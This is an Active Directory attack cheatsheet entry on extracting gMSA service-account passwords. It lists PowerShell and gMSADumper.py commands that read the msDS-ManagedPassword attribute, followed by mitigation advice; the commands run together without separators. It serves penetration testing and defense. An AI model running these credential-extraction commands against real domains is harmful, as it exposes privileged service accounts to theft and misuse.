Gmsa Passwords
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
gMSA (Group Managed Service Account) Password attacks target the ability to retrieve gMSA passwords from Active Directory. Any account with the ability to read msDS-ManagedPassword attribute (or through LDAP queries) can retrieve the current password of a gMSA.
Reading gMSA passwords provides access to service accounts that often have elevated privileges on multiple systems.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Gmsa Passwords:
Get-ADServiceAccount -Identity svc_gmsa -Properties msDS-ManagedPassword$gmsa = Get-ADServiceAccount -Identity svc_gmsa -Properties msDS-ManagedPassword; $gmsa.msDS-ManagedPasswordgMSADumper.py -u user -p password -d domain.local -l dc.domain.localpython3 gMSADumper.py -u USER -p PASS -d DOMAIN -l DC_IPTools & Techniques
Recommended tools for Gmsa Passwords:
- PowerShell Get-ADServiceAccount: read gMSA password
- gMSADumper: Python tool for gMSA password extraction
- Requires: read access to msDS-ManagedPassword attribute
Prevention & Mitigation
Security recommendations to prevent Gmsa Passwords:
- Restrict read access to msDS-ManagedPassword attribute
- Delegate gMSA access only to authorized administrators
- Use separate gMSAs for different services
- Monitor for unusual LDAP queries against gMSA objects
References
Additional resources: